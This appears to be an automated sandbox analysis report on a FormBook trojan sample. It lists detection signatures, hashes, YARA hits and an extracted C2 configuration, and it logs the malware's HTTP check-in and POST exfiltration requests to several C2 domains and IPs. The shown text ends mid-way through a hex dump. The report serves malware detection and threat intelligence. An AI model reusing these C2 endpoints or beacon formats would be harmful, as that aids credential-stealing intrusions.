Windows Analysis Report
Lc8xQv8iZY.exe

Overview

General Information

Sample Name: Lc8xQv8iZY.exe
Analysis ID: 756323
MD5: 30571d64c9a9ed267159fa941a20840c
SHA1: bfb81d8a7c94781b3bd939bd17d500ae61b2ff70
SHA256: 85d6c9eac93fb8818d37dc15110ebd060b3e9df48043ee6bcf349df6aed047c5
Tags: 32exeFormbooktrojan
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to read the clipboard data
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: Lc8xQv8iZY.exe ReversingLabs: Detection: 48%
Source: Lc8xQv8iZY.exe Virustotal: Detection: 47% Perma Link
Yara detected FormBook
Source: Yara match File source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.lopezmodeling.com/henz/?4hq=dpH6BKfQQ0cm5Imeo72RAP4DEbjLNfLp0vSyI4bn1RZjePkdeS9augOMgWVykt+ztx1R3MJW/gsn5nuFARzMtUktTfqb4tJ3+A==&o8=wR-h28Gxg Avira URL Cloud: Label: malware
Source: http://www.eufidelizo.com/henz/?4hq=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0flOUm4qON1Jqzg==&o8=wR-h28Gxg Avira URL Cloud: Label: malware
Source: http://www.brennancorps.info/henz/?4hq=P4ST2IJPckjMYpRf2FLdq0axEROKy7OOggEf6mHPhnME1yGBMW0egmkxYDI06dmXm7z7OVgXWzJ+YqSrULYkiycbwQA+qKMVmQ==&o8=wR-h28Gxg Avira URL Cloud: Label: malware
Source: http://www.lopezmodeling.com/henz/ Avira URL Cloud: Label: malware
Source: http://www.brennancorps.info/henz/ Avira URL Cloud: Label: malware
Source: www.brennancorps.info/henz/ Avira URL Cloud: Label: malware
Source: http://www.lyonfinancialusa.com/henz/ Avira URL Cloud: Label: malware
Source: http://www.afterdarksocial.club/henz/ Avira URL Cloud: Label: malware
Source: http://www.foxwhistle.com/henz/ Avira URL Cloud: Label: malware
Source: http://www.patrickguarte.com/henz/ Avira URL Cloud: Label: malware
Source: http://www.patrickguarte.com/henz/?4hq=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYcUTUl/8YIp7EDwQ==&o8=wR-h28Gxg Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: eufidelizo.com Virustotal: Detection: 8% Perma Link
Source: www.eufidelizo.com Virustotal: Detection: 6% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe ReversingLabs: Detection: 53%
Machine Learning detection for sample
Source: Lc8xQv8iZY.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Joe Sandbox ML: detected
Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.brennancorps.info/henz/"]}
Uses 32bit PE files
Source: Lc8xQv8iZY.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Binary string: wntdll.pdbUGP source: hvbvmxm.exe, 00000001.00000003.304073189.0000000002740000.00000004.00001000.00020000.00000000.sdmp, hvbvmxm.exe, 00000001.00000003.303031511.00000000028D0000.00000004.00001000.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000003.310467881.00000000008FC000.00000004.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.387087600.0000000000BAF000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000003.308974263.0000000000757000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.385661856.0000000000563000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000002.569002403.000000000320F000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.387371533.0000000000700000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: hvbvmxm.exe, hvbvmxm.exe, 00000003.00000003.310467881.00000000008FC000.00000004.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.387087600.0000000000BAF000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000003.308974263.0000000000757000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.385661856.0000000000563000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000002.569002403.000000000320F000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.387371533.0000000000700000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Code function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00405620
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Code function: 0_2_00405FF6 FindFirstFileA,FindClose, 0_2_00405FF6
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Code function: 0_2_00402654 FindFirstFileA, 0_2_00402654
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_00410370 FindFirstFileExW, 1_2_00410370

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.patrickguarte.com
Source: C:\Windows\explorer.exe Network Connect: 155.159.61.221 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.eufidelizo.com
Source: C:\Windows\explorer.exe Network Connect: 192.185.35.86 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.lyonfinancialusa.com
Source: C:\Windows\explorer.exe Domain query: www.afterdarksocial.club
Source: C:\Windows\explorer.exe Domain query: www.lopezmodeling.com
Source: C:\Windows\explorer.exe Network Connect: 192.185.217.47 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 206.233.197.135 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.22.100.62 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 162.214.129.149 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.foxwhistle.com
Source: C:\Windows\explorer.exe Network Connect: 2.57.90.16 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.brennancorps.info
Source: C:\Windows\explorer.exe Domain query: www.19t221013d.tokyo
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49697 -> 206.233.197.135:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49697 -> 206.233.197.135:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49697 -> 206.233.197.135:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49699 -> 162.214.129.149:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49699 -> 162.214.129.149:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49699 -> 162.214.129.149:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.brennancorps.info/henz/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View ASN Name: COGENT-174US COGENT-174US
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /henz/?4hq=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0flOUm4qON1Jqzg==&o8=wR-h28Gxg HTTP/1.1Host: www.eufidelizo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /henz/?4hq=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIszhxIs75pfZv/CVEdhBuwKxvuqF4TRlzEsULWUGP1g0EPzg==&o8=wR-h28Gxg HTTP/1.1Host: www.lyonfinancialusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /henz/?4hq=8TptbrIX6F4NxrWdTDNRTBReo0fMEuELv5cUeaX5N5UPFd9Hxy/eTVHt8QapNK2qZdoBzpjQ3MhBnX7XpU/EbwlnLs/kdjkkcQ==&o8=wR-h28Gxg HTTP/1.1Host: www.afterdarksocial.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /henz/?4hq=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYcUTUl/8YIp7EDwQ==&o8=wR-h28Gxg HTTP/1.1Host: www.patrickguarte.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /henz/?4hq=P4ST2IJPckjMYpRf2FLdq0axEROKy7OOggEf6mHPhnME1yGBMW0egmkxYDI06dmXm7z7OVgXWzJ+YqSrULYkiycbwQA+qKMVmQ==&o8=wR-h28Gxg HTTP/1.1Host: www.brennancorps.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /henz/?4hq=dpH6BKfQQ0cm5Imeo72RAP4DEbjLNfLp0vSyI4bn1RZjePkdeS9augOMgWVykt+ztx1R3MJW/gsn5nuFARzMtUktTfqb4tJ3+A==&o8=wR-h28Gxg HTTP/1.1Host: www.lopezmodeling.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /henz/?4hq=jIhXpQA4pSG2yYWBb37zpp/PG+nmQ9F5uiLrR0YNz1ez7r/FQUV2GqKIrgsyQUbvld7C5UuQUlYsY6nmozac85OtAKDr0AUC2A==&o8=wR-h28Gxg HTTP/1.1Host: www.foxwhistle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 192.185.217.47 192.185.217.47
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /henz/ HTTP/1.1Host: www.lyonfinancialusa.comConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.lyonfinancialusa.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lyonfinancialusa.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 71 3d 46 5f 54 33 34 4d 43 59 37 4c 4c 6c 35 30 36 46 70 55 6d 45 4c 6d 56 30 6d 31 6d 41 7e 59 47 31 45 72 5a 72 7a 51 72 43 4f 57 4d 4c 57 30 50 39 66 6d 38 71 30 51 56 44 6d 5a 39 4b 58 4c 58 59 43 47 67 65 67 44 28 54 4b 77 71 30 79 6a 6f 58 48 68 65 62 75 32 37 65 5a 42 62 45 69 45 6b 62 33 42 53 6a 35 64 4f 6e 57 42 38 78 4b 44 71 48 63 52 32 4b 48 38 32 37 68 43 41 6c 51 79 65 4e 57 59 50 55 32 4c 59 59 6e 75 74 6f 58 35 49 43 7a 65 73 58 73 41 4b 7a 4d 4c 79 53 41 5f 6b 2d 4b 4d 30 4f 32 5f 38 30 57 4c 61 6b 52 4f 65 51 4c 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hq=F_T34MCY7LLl506FpUmELmV0m1mA~YG1ErZrzQrCOWMLW0P9fm8q0QVDmZ9KXLXYCGgegD(TKwq0yjoXHhebu27eZBbEiEkb3BSj5dOnWB8xKDqHcR2KH827hCAlQyeNWYPU2LYYnutoX5ICzesXsAKzMLySA_k-KM0O2_80WLakROeQLw).
Source: global traffic HTTP traffic detected: POST /henz/ HTTP/1.1Host: www.afterdarksocial.clubConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.afterdarksocial.clubUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.afterdarksocial.club/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 71 3d 78 52 42 4e 59 66 6f 55 79 47 73 48 35 70 57 58 50 6b 34 67 55 52 30 62 31 78 47 6c 43 71 63 4a 6e 59 6f 75 65 4c 76 44 52 72 55 33 4c 74 52 78 78 42 4f 4b 54 58 37 56 68 44 53 6c 43 70 65 6a 56 38 35 48 73 5a 4b 50 31 65 30 39 69 47 6e 2d 6f 31 4c 7a 5a 54 4e 45 43 76 72 32 5a 51 63 57 66 59 35 34 36 45 77 73 4f 4d 41 54 43 73 4d 74 53 42 49 37 47 4f 4a 51 66 32 30 47 45 70 37 30 66 39 31 5f 75 6d 4e 79 4e 75 31 32 74 77 56 64 37 5a 42 4f 4f 71 62 36 35 79 43 5f 53 4c 32 6a 4d 79 37 32 35 65 52 55 37 4f 77 73 68 47 53 56 63 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hq=xRBNYfoUyGsH5pWXPk4gUR0b1xGlCqcJnYoueLvDRrU3LtRxxBOKTX7VhDSlCpejV85HsZKP1e09iGn-o1LzZTNECvr2ZQcWfY546EwsOMATCsMtSBI7GOJQf20GEp70f91_umNyNu12twVd7ZBOOqb65yC_SL2jMy725eRU7OwshGSVcA).
Source: global traffic HTTP traffic detected: POST /henz/ HTTP/1.1Host: www.patrickguarte.comConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.patrickguarte.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.patrickguarte.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 71 3d 30 72 56 75 73 4f 28 4a 6e 64 6d 42 33 79 67 33 33 31 6c 64 33 47 58 57 33 64 4a 4e 62 61 42 51 37 6e 44 43 46 6b 6d 33 43 67 48 48 37 53 4d 36 72 76 75 47 67 41 5a 47 68 32 57 50 62 49 58 34 56 56 72 4b 4f 62 34 41 51 6f 41 65 31 38 75 43 6e 67 55 4a 57 52 4a 34 28 75 4d 75 76 4c 64 48 79 56 4a 38 50 6c 4b 54 30 4b 6c 59 70 47 46 38 6c 5f 30 42 45 76 4e 37 78 77 7a 4c 6c 5f 4f 6b 72 45 32 69 66 6e 64 45 6b 6c 55 52 5a 57 34 74 65 6b 4e 33 67 53 6d 47 61 63 31 43 47 36 33 69 6e 33 53 33 41 36 71 70 49 52 49 44 4e 46 7e 47 49 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hq=0rVusO(JndmB3yg331ld3GXW3dJNbaBQ7nDCFkm3CgHH7SM6rvuGgAZGh2WPbIX4VVrKOb4AQoAe18uCngUJWRJ4(uMuvLdHyVJ8PlKT0KlYpGF8l_0BEvN7xwzLl_OkrE2ifndEklURZW4tekN3gSmGac1CG63in3S3A6qpIRIDNF~GIA).
Source: global traffic HTTP traffic detected: POST /henz/ HTTP/1.1Host: www.brennancorps.infoConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.brennancorps.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.brennancorps.info/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 71 3d 43 36 36 7a 31 2d 46 33 50 30 6d 6f 65 62 4e 7a 7e 51 71 50 73 58 72 32 61 6b 65 42 31 62 43 41 6e 53 55 34 33 45 57 56 36 47 38 51 75 69 53 77 4b 78 55 5a 6d 32 77 6a 55 6a 77 6b 7a 66 75 54 6e 37 57 47 44 32 64 6d 59 52 64 38 52 4a 6a 62 62 50 55 4e 6b 69 49 58 75 42 41 6c 68 39 74 51 6c 72 42 51 56 52 4c 62 6e 50 6f 79 46 49 65 43 56 69 73 32 79 4d 59 73 55 32 49 66 73 4b 69 4b 66 63 31 64 35 65 4e 5f 61 39 53 2d 44 4c 72 4a 54 30 77 6f 41 6a 42 53 51 4a 37 68 6c 41 56 34 61 4f 37 69 65 4e 44 32 59 71 6a 41 33 6d 47 31 67 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hq=C66z1-F3P0moebNz~QqPsXr2akeB1bCAnSU43EWV6G8QuiSwKxUZm2wjUjwkzfuTn7WGD2dmYRd8RJjbbPUNkiIXuBAlh9tQlrBQVRLbnPoyFIeCVis2yMYsU2IfsKiKfc1d5eN_a9S-DLrJT0woAjBSQJ7hlAV4aO7ieND2YqjA3mG1gw).
Source: global traffic HTTP traffic detected: POST /henz/ HTTP/1.1Host: www.lopezmodeling.comConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.lopezmodeling.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lopezmodeling.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 71 3d 51 72 76 61 43 39 61 69 56 32 4d 36 28 65 75 56 73 50 58 43 4c 75 38 51 48 75 32 52 48 34 28 72 32 39 32 74 4c 61 4b 33 32 77 6c 51 64 76 38 44 4f 6c 41 63 6c 6a 36 4d 38 45 6c 32 6a 75 71 59 6d 43 45 51 35 74 45 6a 39 53 49 6a 68 57 4f 46 43 30 54 36 70 68 55 78 63 59 75 64 78 2d 39 56 7e 4f 44 72 35 53 4e 52 6c 67 65 7a 51 66 28 65 6e 68 7a 75 54 34 42 5a 73 30 49 31 37 7a 73 43 70 68 6b 45 74 7a 70 4b 31 36 71 54 41 37 61 6e 31 6e 74 55 54 6d 6b 34 54 37 72 41 41 35 35 4b 6b 45 78 45 73 59 4d 6e 64 7a 51 78 7a 44 7e 4f 52 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hq=QrvaC9aiV2M6(euVsPXCLu8QHu2RH4(r292tLaK32wlQdv8DOlAclj6M8El2juqYmCEQ5tEj9SIjhWOFC0T6phUxcYudx-9V~ODr5SNRlgezQf(enhzuT4BZs0I17zsCphkEtzpK16qTA7an1ntUTmk4T7rAA55KkExEsYMndzQxzD~ORw).
Source: global traffic HTTP traffic detected: POST /henz/ HTTP/1.1Host: www.foxwhistle.comConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.foxwhistle.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.foxwhistle.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 71 3d 75 4b 4a 33 71 67 6f 51 6a 53 53 49 6c 37 32 53 57 52 62 78 6d 4a 66 79 62 2d 43 48 5a 61 64 44 71 46 6a 78 48 58 77 39 33 69 43 66 6a 62 65 45 52 54 39 32 4c 59 53 45 33 41 4d 38 63 33 61 5a 67 38 43 4b 6d 47 6a 6a 44 46 31 39 43 71 33 69 35 31 36 62 34 4c 61 63 41 5a 4c 31 77 7a 45 78 77 70 79 56 48 52 6b 62 4f 53 7e 71 41 33 58 61 4a 37 6b 37 62 74 6d 45 4b 38 6e 45 35 33 74 6f 56 37 6c 56 72 36 50 49 42 54 57 77 58 39 76 46 62 47 67 4c 7e 48 70 47 45 74 4f 2d 73 72 33 35 7e 37 51 67 4b 64 72 48 41 74 48 34 6c 47 7e 42 57 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hq=uKJ3qgoQjSSIl72SWRbxmJfyb-CHZadDqFjxHXw93iCfjbeERT92LYSE3AM8c3aZg8CKmGjjDF19Cq3i516b4LacAZL1wzExwpyVHRkbOS~qA3XaJ7k7btmEK8nE53toV7lVr6PIBTWwX9vFbGgL~HpGEtO-sr35~7QgKdrHAtH4lG~BWg).
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:25:17 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Thu, 29 Sep 2022 21:55:23 GMTAccept-Ranges: bytesContent-Length: 11816Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 20 70 72 6f 66 69 6c 65 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 09 09 3c 21 2d 2d 20 41 64 64 20 53 6c 69 64 65 20 4f 75 74 73 20 2d 2d 3e 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 20 20 20 20 20 20 20 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 63 67 69 2d 73 79 73 2f 6a 73 2f 73 69 6d 70 6c 65 2d 65 78 70 61 6e 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 68 65 6c 76 65 74 69 63 61 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 32 30 70 78 20 61 75 74 6f 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 74 6f 70 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 74 6f 70 5f 77 2e 6a 70 67 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 68 65 69 67 68 74 3a 31 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 6d 69 64 2e 67 69 66 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65 70 65 61 74 2d 79 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:25:31 GMTServer: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635Accept-Ranges: bytesConnection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 35 37 39 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 